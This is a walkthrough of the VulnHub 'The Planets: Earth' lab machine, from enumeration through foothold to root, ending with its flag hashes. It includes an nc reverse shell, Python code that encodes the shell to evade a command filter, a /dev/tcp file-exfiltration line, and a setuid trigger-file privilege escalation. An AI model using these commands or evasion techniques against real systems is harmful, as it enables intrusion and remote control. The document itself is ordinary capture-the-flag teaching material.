The Planets: Earth || Vulnhub Complete Walkthrough

Earth is rated easy, though depending on your experience you may find it on the harder side of easy. There are two flags on the box, a user flag and a root flag, each containing an MD5 hash. The VM has been tested on VirtualBox, so it may not work correctly on VMware.


Setting Up

Setting up The Planets: Earth machine is straightforward; follow the steps below:

1. Download the OVA image from VulnHub.

2. Open VirtualBox, click Import, and select the downloaded file.

3. Once the import succeeds, attach the VM's network adapter to a network your attacking machine can also reach (the scans below use VirtualBox's host-only network, 192.168.56.0/24). Having target and attacker on the same segment is what lets the ARP-based host discovery in the enumeration phase find the box.


Enumeration

Our first step is to find the target's IP address with netdiscover, which sends and listens for ARP requests on the local segment.

  • Note: the VirtualMachine (OVA) file imported above sits on the same host-only network as the attacking machine.

 Currently scanning: 192.168.99.0/16   |   Screen View: Unique Hosts

 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:db:90:6f      1      42  PCS Systemtechnik GmbH
 192.168.56.104  08:00:27:a2:0e:43      1      60  PCS Systemtechnik GmbH

Two hosts answer. 192.168.56.100 is normally VirtualBox's own DHCP server on the host-only network, so the target is 192.168.56.104 (MAC 08:00:27:a2:0e:43, an Oracle VirtualBox NIC, which the Nmap scan below confirms).


Network Enumeration using Nmap

With the IP address known, the next step is a port scan to see which services are exposed. This is an essential part of enumeration: it maps the attack surface and lets us design targeted attacks. As in most cases, we use the well-known Nmap tool with these switches:

  • -sC: Performs a script scan using the default set of scripts; equivalent to --script=default. Some scripts in this category are considered intrusive and should not be run against a network without permission.
  • -sV: Enables version detection, which reports what software and version is listening on each open port.
  • -v: Verbose output, so progress and discovered ports are printed as the scan runs.
  • -T4: The "aggressive" timing template, fine on a local lab network.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ sudo nmap -sV -sC -v -T4 192.168.56.104
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 16:53 IST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
Initiating ARP Ping Scan at 16:53
Scanning 192.168.56.104 [1 port]
Completed ARP Ping Scan at 16:53, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:53
Completed Parallel DNS resolution of 1 host. at 16:53, 0.22s elapsed
Initiating SYN Stealth Scan at 16:53
Scanning 192.168.56.104 [1000 ports]
Discovered open port 80/tcp on 192.168.56.104
Discovered open port 443/tcp on 192.168.56.104
Discovered open port 22/tcp on 192.168.56.104
Completed SYN Stealth Scan at 16:53, 6.21s elapsed (1000 total ports)
Initiating Service scan at 16:53
Scanning 3 services on 192.168.56.104
Completed Service scan at 16:53, 12.22s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.56.104.
Initiating NSE at 16:53
Completed NSE at 16:53, 2.59s elapsed
Initiating NSE at 16:53
Completed NSE at 16:54, 1.38s elapsed
Initiating NSE at 16:54
Completed NSE at 16:54, 0.00s elapsed
Nmap scan report for 192.168.56.104
Host is up (0.024s latency).
Not shown: 985 filtered tcp ports (no-response), 12 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Test Page for the HTTP Server on Fedora
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after:  2031-10-10T23:26:31
| MD5:   4efa 65d2 1a9e 0718 4b54 41da 3712 f187
|_SHA-1: 04db 5b29 a33f 8076 f16b 8a1b 581d 6988 db25 7651
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:A2:0E:43 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 16:54
Completed NSE at 16:54, 0.00s elapsed
Initiating NSE at 16:54
Completed NSE at 16:54, 0.00s elapsed
Initiating NSE at 16:54
Completed NSE at 16:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.32 seconds
           Raw packets sent: 1989 (87.500KB) | Rcvd: 16 (1.024KB)
┌─[mrdev@TS]─[~]
└──╼ $

We spot three open ports: 22 (OpenSSH 8.6), 80 (Apache httpd 2.4.51 on Fedora, built with mod_wsgi/4.7.1 and Python/3.9, so a Python web application is probably behind it) and 443 (the same Apache build over TLS). Note that port 80 answered a request by IP address with "Bad Request (400)", which suggests the server expects a specific Host header, i.e. name-based virtual hosting.

The TLS certificate on port 443 (Nmap's ssl-cert script) gives us two hostnames:

443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Test Page for the HTTP Server on Fedora
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
<SNIP>

Add both hostnames to /etc/hosts on the attacking machine, mapped to the target IP (a single line: 192.168.56.104 followed by earth.local and terratest.earth.local), so the browser sends the right Host header and TLS SNI:

┌─[mrdev@TS]─[~]
└──╼ $ sudo nano /etc/hosts
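The same hosts-file step, as an added example written for this walkthrough (it is not code from the original page or from the box). It pulls the CN and SAN hostnames out of the ssl-cert block Nmap printed above, which is embedded here as constructed sample text, and merges them into an existing /etc/hosts text without producing duplicate lines. The file path and the target IP are the ones used on this page; everything else is an assumption of the example.

```python
import re

# Constructed sample: the ssl-cert lines as Nmap -sC printed them for this box.
NMAP_SSL_CERT = """\
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
"""

TARGET_IP = "192.168.56.104"   # the VM found with netdiscover above


def cert_hostnames(nmap_output: str) -> list[str]:
    """Hostnames the certificate vouches for: the Subject CN first, then every
    DNS SAN, without duplicates. Wildcard names are skipped because they are
    not usable as a literal /etc/hosts entry."""
    names: list[str] = []
    cn = re.search(r"Subject:.*?commonName=([^/\s]+)", nmap_output)
    if cn:
        names.append(cn.group(1))
    for san in re.findall(r"DNS:\s*([A-Za-z0-9*.-]+)", nmap_output):
        if san.startswith("*") or san in names:
            continue
        names.append(san)
    return names


def merge_hosts(hosts_text: str, ip: str, names: list[str]) -> str:
    """Return hosts_text with `ip` mapped to `names`. If a line for `ip`
    already exists, its names are kept and the new ones appended, so running
    the helper twice never duplicates an entry."""
    out: list[str] = []
    merged = False
    for line in hosts_text.splitlines():
        fields = line.split()
        if fields and not fields[0].startswith("#") and fields[0] == ip:
            existing = fields[1:]
            extra = [n for n in names if n not in existing]
            out.append(" ".join([ip, *existing, *extra]))
            merged = True
        else:
            out.append(line)
    if not merged:
        out.append(" ".join([ip, *names]))
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    # Usage: print the merged file; write it back to /etc/hosts with sudo.
    import pathlib
    current = pathlib.Path("/etc/hosts").read_text()
    print(merge_hosts(current, TARGET_IP, cert_hostnames(NMAP_SSL_CERT)), end="")
```

Collecting every SAN matters on boxes like this one: the second name, terratest.earth.local, is served only as a separate virtual host and is where the clue for the login lives.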

Open a browser of your choice and visit the following link:

earth.local

If you scroll down, you will spot a few encrypted messages, displayed as hexadecimal strings, alongside a "Message Key" field:


Directory Busting using Gobuster

Next we look for hidden or unlinked directories and pages, which is what directory busting is for. Using gobuster as our tool of choice, the following switches give fast, accurate results:

  • dir : Uses directory/file enumeration mode.
  • -u : The target URL.
  • -w : Path to the wordlist.
  • -k : Skip TLS certificate verification (needed later, because the box's certificate is self-signed).

┌─[mrdev@TS]─[~]
└──╼ $ gobuster dir -u http://earth.local/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://earth.local/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/23 20:11:12 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 0] [--> /admin/]
/cgi-bin/             (Status: 403) [Size: 199]            
                                                           
===============================================================
2022/01/23 20:11:48 Finished
===============================================================
┌─[mrdev@TS]─[~]
└──╼ $

An /admin directory is a promising find: an admin page could give us leverage against the target once we have credentials.

Clicking Login redirects to a login page:

We have no credentials yet, so we need to find some. After a little research, the second hostname turned out to be a test site that may hold a clue:

Open Browser and Visit this site:

  • Remember: access this site over HTTPS; the hostname comes from the TLS certificate on port 443.

https://terratest.earth.local/


Again we enumerate hidden directories with gobuster, this time adding -k because the certificate is self-signed:

┌─[mrdev@TS]─[~]
└──╼ $ gobuster dir -u https://terratest.earth.local/ -k -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://terratest.earth.local/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/23 20:27:58 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 199]
/.htaccess            (Status: 403) [Size: 199]
/.htpasswd            (Status: 403) [Size: 199]
/cgi-bin/             (Status: 403) [Size: 199]
/index.html           (Status: 200) [Size: 26] 
/robots.txt           (Status: 200) [Size: 521]
                                               
===============================================================
2022/01/23 20:29:36 Finished
===============================================================
┌─[mrdev@TS]─[~]
└──╼ $

Directory busting turns up an interesting file: robots.txt.

https://terratest.earth.local/robots.txt

robots.txt lists a path with a wildcard extension, /testingnotes.*; trying the .txt extension works:

https://terratest.earth.local/testingnotes.txt

It is a note left behind by a developer or admin.

From the note we learn that the encryption algorithm is XOR, that the key is probably the contents of testdata.txt, that the admin portal username is terra, and that the admin portal is /admin on the other site (earth.local).

https://terratest.earth.local/testdata.txt

This looks like the text that was used to produce the first few messages shown on earth.local. Let's try to decode those messages with this information.


Decrypting Encrypted Messages with CyberChef

Let's decrypt the messages using CyberChef.

  • Learn more: CyberChef: The Cyber Swiss Army Knife


Visit CyberChef (https://gchq.github.io/CyberChef/):

The messages are hexadecimal, so they must first be decoded to bytes and then XORed with the key. Drag the From Hex and XOR operations into the recipe, in that order:


Paste each encrypted message into the input in turn, and paste the contents of testdata.txt as the XOR key.

  • Remember: set the key type to UTF-8 (CyberChef's XOR key defaults to Hex, which would misread a text key).

One of the messages comes out as earthclimatechangebad4humans repeated over and over. Because XOR is symmetric, XORing a ciphertext with its plaintext (here testdata.txt) yields the key stream, and a key stream that repeats means that string is the key itself. It may well be the password of the user terra.
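The CyberChef recipe above, as an added example in code (written for this walkthrough, not taken from the page or the box). It encrypts a constructed plaintext under the recovered string with repeating-key XOR to produce a hex message like those on earth.local, then runs the known-plaintext step the page performs: XOR the ciphertext with the plaintext to get the key stream, and find its shortest repeating unit. The plaintext is made up here, since the box's real message bodies are not reproduced on the page; the key is the string the page recovered.

```python
from itertools import cycle

# The string the page recovers with CyberChef; here it doubles as the key.
KEY = "earthclimatechangebad4humans"

# Constructed plaintext standing in for testdata.txt.
PLAINTEXT = (
    "According to radiometric dating estimation and other evidence, Earth "
    "formed over 4.5 billion years ago. Earth is the third planet from the Sun."
)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; encryption and decryption are the same operation."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def encrypt_hex(plaintext: str, key: str) -> str:
    """Produce a hex message like the ones displayed on earth.local."""
    return xor_repeating(plaintext.encode(), key.encode()).hex()


def decrypt_hex(cipher_hex: str, key: str) -> str:
    """The CyberChef recipe 'From Hex' -> 'XOR (key as UTF-8)', in code."""
    return xor_repeating(bytes.fromhex(cipher_hex), key.encode()).decode()


def recover_keystream(cipher_hex: str, known_plaintext: str) -> bytes:
    """Known-plaintext attack: C XOR P = key stream, byte for byte, over the
    bytes where both are available (zip stops at the shorter input)."""
    return bytes(c ^ p for c, p in zip(bytes.fromhex(cipher_hex), known_plaintext.encode()))


def shortest_period(keystream: bytes) -> bytes:
    """The shortest unit whose repetition reproduces the whole key stream.
    If the known plaintext is shorter than the real key, no shorter period
    exists and the whole stream is returned: recovering the key needs at
    least one full key length of known plaintext."""
    for n in range(1, len(keystream)):
        if all(keystream[i] == keystream[i % n] for i in range(len(keystream))):
            return keystream[:n]
    return keystream


if __name__ == "__main__":
    ct = encrypt_hex(PLAINTEXT, KEY)
    ks = recover_keystream(ct, PLAINTEXT)
    print("ciphertext:", ct[:64], "...")
    print("key stream:", ks[:60].decode(), "...")
    print("recovered key:", shortest_period(ks).decode())
```

The period check is why the page sees the password "as a repeating string": testdata.txt is several times longer than the 28-byte key, so the key stream wraps around many times and the repeat is obvious by eye.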


Foothold

Let's try to log in as terra with that password on the login panel we found earlier (earth.local/admin).

After a successful login we get a CLI: a web form that runs a command on the server and shows the result. Let's try a simple command:

Our assumption was right and we got the command's output back. Next, let's try to turn this into a reverse shell:

nc -e /bin/sh 192.168.56.1 4444


The application answers with a warning instead of running it, so the simplest method is blocked. The check evidently acts on the submitted command string:

We can bypass this either by writing the listener's IP address in decimal notation, so no dotted address appears in the command, or by base64-encoding the whole command and having the target decode and run it.

Open terminal and input below command:

┌─[mrdev@TS]─[~]
└──╼ $ echo 'nc -e /bin/sh 192.168.56.1 4444' | base64
bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEgNDQ0NAo=
┌─[mrdev@TS]─[~]
└──╼ $
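Both bypass variants, as an added example written for this walkthrough (not code from the page or from the box). The filter_rejects function is a constructed stand-in for the portal's check: the page only shows that the raw command was refused, and the real logic on the box is not known from the page. The listener address and port are the ones used on this page; the base64 string it produces is the same one the echo command above printed.

```python
import base64
import ipaddress
import re

LISTENER_IP = "192.168.56.1"    # attacking machine, from the walkthrough
LISTENER_PORT = 4444
REVERSE_SHELL = f"nc -e /bin/sh {LISTENER_IP} {LISTENER_PORT}"

# Constructed stand-in for the portal's filter (assumption: it refuses any
# command containing a dotted-quad address).
DOTTED_QUAD = re.compile(r"(?<!\d)(\d{1,3}\.){3}\d{1,3}(?!\d)")


def filter_rejects(cmd: str) -> bool:
    """True when a dotted-quad IP address appears anywhere in the command."""
    return DOTTED_QUAD.search(cmd) is not None


def ip_to_decimal(ip: str) -> int:
    """Dotted quad to the single 32-bit integer that inet_aton, and so most
    Linux network clients, accept: 192.168.56.1 -> 3232249857."""
    return int(ipaddress.IPv4Address(ip))


def decimal_variant(cmd: str, ip: str) -> str:
    """Rewrite the address so no dot-separated quad is left for the filter."""
    return cmd.replace(ip, str(ip_to_decimal(ip)))


def base64_variant(cmd: str) -> str:
    """Hide the whole command: the submitted string carries only base64 text,
    and the target's own shell decodes and runs it. The trailing newline
    matches `echo '<cmd>' | base64` on the attacking machine."""
    blob = base64.b64encode((cmd + "\n").encode()).decode()
    return f"echo '{blob}' | base64 -d | bash"


if __name__ == "__main__":
    for variant in (REVERSE_SHELL,
                    decimal_variant(REVERSE_SHELL, LISTENER_IP),
                    base64_variant(REVERSE_SHELL)):
        verdict = "REJECTED" if filter_rejects(variant) else "passes  "
        print(f"{verdict}  {variant}")
```

The lesson for the defender is the same for both variants: a blacklist on the command text cannot win, because the shell that eventually runs the command accepts far more encodings than the filter anticipates. The fix is not to hand attacker-controlled strings to a shell at all.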

Copy this output and switch back to the browser. Before pasting anything, start a Netcat listener on the attacking machine:

┌─[mrdev@TS]─[~]
└──╼ $ nc -lvnp 4444
listening on [any] 4444 ...

Now paste the following into the CLI, substituting the base64 string produced above:

echo '<base64 string>' | base64 -d | bash

The listener receives a connection from the target (Netcat reports the source as UNKNOWN because -n disables reverse DNS lookups):

┌─[mrdev@TS]─[~]
└──╼ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.104] 34816
python3 -c 'import pty;pty.spawn("/bin/bash")'   # Upgrade to a pty shell (the box ships Python 3)
bash-5.1$ whoami
whoami
apache
bash-5.1$

We have a foothold on The Planets: Earth, but only as the apache user, with no administrator privileges.


Privilege Escalation

Let's list SUID binaries and see if any of them offers a way to root. The -perm -u=s test matches files with the setuid bit set (the same as -perm -4000); errors from unreadable directories are discarded:

bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
bash-5.1$

One entry stands out: /usr/bin/reset_root is not a standard system binary, and a setuid program with that name may well hand us root. Let's run it:

bash-5.1$ file /usr/bin/reset_root    # Find out file information
file /usr/bin/reset_root
/usr/bin/reset_root: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=4851fddf6958d92a893f3d8042d04270d8d31c23, for GNU/Linux 3.2.0, not stripped
bash-5.1$ reset_root    # Run the binary
reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
bash-5.1$

The binary fails with RESET FAILED. To understand what it checks for, we copy it to the attacking machine for analysis, using bash's /dev/tcp redirection on the target:

bash-5.1$ cat /usr/bin/reset_root > /dev/tcp/192.168.56.1/3333                                             

Before running that command, open a new terminal on the attacking machine and start a Netcat listener on port 3333 with its output redirected into a file named reset_root.


With reset_root downloaded, let's trace its library calls with ltrace:

┌─[mrdev@TS]─[~]
└──╼ $ chmod +x reset_root    # Give an executable permission
┌─[mrdev@TS]─[~]
└──╼ $ ltrace ./reset_root     # Trace the reset_root file
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                                      = 38
access("/dev/shm/kHgTFI5G", 0)                                                   = -1
access("/dev/shm/Zw7bV9U5", 0)                                                   = -1
access("/tmp/kcM0Wewe", 0)                                                       = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                                      = 44
+++ exited (status 0) +++
┌─[mrdev@TS]─[~]
└──╼ $

The output shows that the binary tests three paths with access() and that all three are missing. Two live in /dev/shm and one in /tmp, both world-writable, so the unprivileged apache user can simply create them. Once they exist, the binary resets the root password:

bash-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
bash-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
bash-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe
bash-5.1$
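The ltrace-to-touch step above, as an added example written for this walkthrough (not code from the page or the box). It parses the ltrace output copied from the run above, keeps the path-probing calls that returned -1, and flags which of those paths an unprivileged user can create because they sit in a world-writable directory. The list of probed functions and of world-writable roots are assumptions of the example.

```python
import re

# The ltrace output copied from the run above.
LTRACE_OUTPUT = """\
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                                      = 38
access("/dev/shm/kHgTFI5G", 0)                                                   = -1
access("/dev/shm/Zw7bV9U5", 0)                                                   = -1
access("/tmp/kcM0Wewe", 0)                                                       = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                                      = 44
+++ exited (status 0) +++
"""

# libc calls whose first argument is a path and whose -1 return means "not there"
PROBE_RE = re.compile(r'^(?:access|stat|lstat|open|openat)\("([^"]+)"[^)]*\)\s*=\s*(-?\d+)')

# Directories any local user can write to; a trigger file here is attacker-controlled.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")


def missing_paths(ltrace_text: str) -> list[str]:
    """Paths the binary probed for and did not find (the call returned -1)."""
    found: list[str] = []
    for line in ltrace_text.splitlines():
        m = PROBE_RE.match(line)
        if m and int(m.group(2)) < 0 and m.group(1) not in found:
            found.append(m.group(1))
    return found


def attacker_creatable(paths: list[str]) -> list[str]:
    """Subset of paths an unprivileged user can simply create."""
    return [p for p in paths if p.startswith(WORLD_WRITABLE)]


def touch_commands(paths: list[str]) -> list[str]:
    """Shell lines to paste into the foothold shell to satisfy the checks."""
    return [f"touch {p}" for p in paths]


if __name__ == "__main__":
    missing = missing_paths(LTRACE_OUTPUT)
    creatable = attacker_creatable(missing)
    print("\n".join(touch_commands(creatable)))
    if len(creatable) < len(missing):
        print("# trigger paths outside world-writable directories:",
              sorted(set(missing) - set(creatable)))
```

The design flaw this exposes is general: a setuid program must never take a security decision from the mere existence of a file in /tmp or /dev/shm, since any local user can create it. Had the triggers lived in a root-owned directory, the touch commands would have failed and this path to root would be closed.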

Let's execute the reset_root file again:

bash-5.1$ reset_root
reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$

The reset succeeded and root's password is now Earth. Let's switch to root and collect the flags:

bash-5.1$ su root
su root
Password: Earth
[root@earth /]# cd /root
cd /root
[root@earth ~]# ls
ls
anaconda-ks.cfg  root_flag.txt
[root@earth ~]# cat root_flag.txt
cat root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at [email protected]
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
[root@earth ~]# cd ..
cd ..
[root@earth /]# cd /var/earth_web
cd /var/earth_web
[root@earth earth_web]# ls
ls
db.sqlite3  earth_web  manage.py  secure_message  user_flag.txt
[root@earth earth_web]# cat user_flag.txt
cat user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
[root@earth earth_web]# 

Congratulations! We have successfully rooted the VulnHub VM and collected both flags.
